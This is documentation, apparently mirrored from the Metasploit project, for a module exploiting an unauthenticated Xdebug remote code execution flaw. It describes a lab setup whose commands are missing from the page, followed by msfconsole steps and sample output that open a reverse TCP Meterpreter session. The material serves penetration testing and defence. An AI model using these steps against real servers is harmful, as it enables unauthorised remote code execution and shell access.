CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/documentation/modules/exploit/unix/http/xdebug_unauth_exec.md
Views: 1904
Vulnerable Application
Xdebug is an actively-maintained PHP debugging tool that supports remote debugging of server-side PHP code
This module exploits an unauthenticated vulnerability that allows for the upload of a PHP file and subsequent execution to provide a Meterpreter session back. The module was tested on XDebug version 2.5.5
The vulnerability was discovered by Ricter Zheng (WARNING: This link is in Chinese. Google Translate version)
Setting up XDebug 2.5.5 on xUbuntu 16.04 x64 Desktop
Start with a LAMP server:
Now grab XDebug, specifically the version cited by @MinatoTW:
Paste the contents of your php -i
output into the XDebug installation wizard, which gave me the following:
The final step of the wizard is to configure php.ini
:
Now that the PHP CLI environment is configured, repeat the above steps for the Apache2 configuration:
And restart Apache2 for good measure:
And now test that XDebug is working:
You should see a fairly small number, in my case 4.6014785766602E-5
, which indicates the number of seconds since the php script started, thus the incredibly small number.
Verification Steps
Start
msfconsole
use exploits/unix/http/xdebug_rce
check
set RHOST 192.168.69.2
set LHOST 192.168.69.1
set VERBOSE true
(optional)exploit
Scenarios
XDebug 2.5.5 on Ubuntu 16.04 with Apache2 2.4.18
msf5 exploit(unix/http/xdebug_unauth_exec) > check
[*] 192.168.69.2:80 - Request sent Date: Fri, 27 Apr 2018 21:00:37 GMT Server: Apache/2.4.18 (Ubuntu) Set-Cookie: XDEBUG_SESSION=WIO6hf4Wez; expires=Fri, 27-Apr-2018 22:00:37 GMT; Max-Age=3600; path=/ Content-Length: 16 Content-Type: text/html; charset=UTF-8
[+] 192.168.69.2:80 - Looks like remote server has xdebug enabled
[*] 192.168.69.2:80 The target service is running, but could not be validated.
msf5 exploit(unix/http/xdebug_unauth_exec) > exploit
[] Started reverse TCP handler on 192.168.69.1:4444 [] 192.168.69.2:80 - Waiting for client response. [] 192.168.69.2:80 - Receiving response 508[removed] [removed][removed][removed]